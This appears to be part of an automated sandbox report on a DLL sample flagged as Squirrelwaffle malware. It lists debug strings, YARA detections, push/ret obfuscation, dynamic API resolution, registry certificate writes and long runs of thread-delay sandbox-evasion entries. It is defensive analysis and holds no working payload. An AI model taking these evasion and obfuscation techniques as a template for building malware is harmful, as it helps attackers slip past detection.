Source: Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb{ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbt source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbc source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: vcruntime140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbe source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb# source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbw source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbi source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Administrator\source\repos\Dll1\Release\Dll1.pdb source: loaddll32.exe, 00000000.00000002.518246060.0000000002A70000.00000040.00000001.sdmp, rundll32.exe
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb_ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Yara detected Squirrelwaffle
Source: Yara match File source: 0.2.loaddll32.exe.2630000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.4590000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a70184.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.45a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.4570184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.4570184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.45a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.4590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.4590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.45a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.4570184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000000.254857742.0000000004590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.515938362.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253813077.0000000004590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.284559646.0000000004590000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B213EC push ecx; ret 0_3_03B213ED
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B22371 push FFFFFFC0h; ret 0_3_03B2237D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B25282 push edi; ret 0_3_03B25287
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B28022 push cs; ret 0_3_03B2802D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B28070 push cs; ret 0_3_03B2807E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B25776 push ebx; ret 0_3_03B25777
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B274B8 push esp; ret 0_3_03B274C0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_03B2BBF7 push esi; retf 0_3_03B2BC3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009470A4 push 009470D0h; ret 3_2_009470C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009460F8 push 00946124h; ret 3_2_0094611C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096811C push 00968175h; ret 3_2_0096816D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0095414C push 00954199h; ret 3_2_00954191
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00946170 push 0094619Ch; ret 3_2_00946194
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00965170 push 0096519Ch; ret 3_2_00965194
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0094D28C push 0094D408h; ret 3_2_0094D400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0095421C push 00954248h; ret 3_2_00954240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00965264 push 00965290h; ret 3_2_00965288
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0094D48C push 0094D4B8h; ret 3_2_0094D4B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0094D40C push 0094D47Bh; ret 3_2_0094D473
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096A584 push 0096A5F9h; ret 3_2_0096A5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096A5FC push 0096A655h; ret 3_2_0096A64D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0097062C push ecx; mov dword ptr [esp], ecx 3_2_00970630
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00968794 push 009687D7h; ret 3_2_009687CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00969798 push 009697C4h; ret 3_2_009697BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009537F0 push 00953898h; ret 3_2_00953890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096974C push 0096978Eh; ret 3_2_00969786
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00953778 push 009537EEh; ret 3_2_009537E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0097B760 push ecx; mov dword ptr [esp], edx 3_2_0097B764
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009688D8 push 00968904h; ret 3_2_009688FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009678E0 push 0096792Fh; ret 3_2_00967927
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096880C push 00968838h; ret 3_2_00968830
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00967154

Hooking and other Techniques for Hiding and Protection:

barindex
Stores large binary data to the registry
Source: C:\Windows\System32\loaddll32.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096549C IsIconic,GetWindowPlacement,GetWindowRect, 3_2_0096549C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009756F4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 3_2_009756F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00974E40 CreateIconFromResourceEx,IsIconic,GetCapture,SetActiveWindow,DrawStateW, 3_2_00974E40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00975F74 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 3_2_00975F74
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00967154
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096A484 3_2_0096A484
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0096A484 3_2_0096A484
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00960D90 GetSystemInfo,GetKeyState, 3_2_00960D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009452FC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_009452FC
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30586 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41872 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41905 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32350 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34986 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31654 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31970 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 33700 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38480 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 33485 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43832 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 42267 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 33837 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32078 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37513 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38304 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31708 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39889 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32221 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32723 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38299 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44379 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43297 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41668 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30142 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40381 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37021 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30435 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41835 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34687 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37017 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 36437 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39186 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34553 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 36196 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41187 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43835 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41523 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34936 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37574 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43310 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 33772 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32630 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 42429 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31133 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40873 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 33556 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39879 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34810 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 42545 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37678 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40066 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31485 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38215 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 42541 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32767 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32836 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37699 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43190 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 36106 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37489 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30692 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31496 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37661 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 42750 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41555 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39387 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34689 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41212 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 35306 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 36113 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44451 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44002 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34889 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37301 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30890 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39251 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37667 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 33391 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34590 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37221 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31275 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43403 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 42938 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43729 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32680 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38620 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 33009 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34668 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32441 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39493 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40555 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 35008 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38823 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38501 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39882 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34591 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37636 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 36974 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34847 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31728 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41887 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44585 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38598 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32366 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43497 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41677 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40858 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44908 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31040 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34510 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44802 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31888 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30663 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41020 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43897 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38718 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 36873 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 31224 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32067 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34611 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 41748 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 35422 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40403 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44885 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34975 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 35503 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34739 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 35501 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40215 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 37460 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 43089 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 40844 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32455 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 34475 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 44090 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 38291 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 39913 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 32697 Jump to behavior
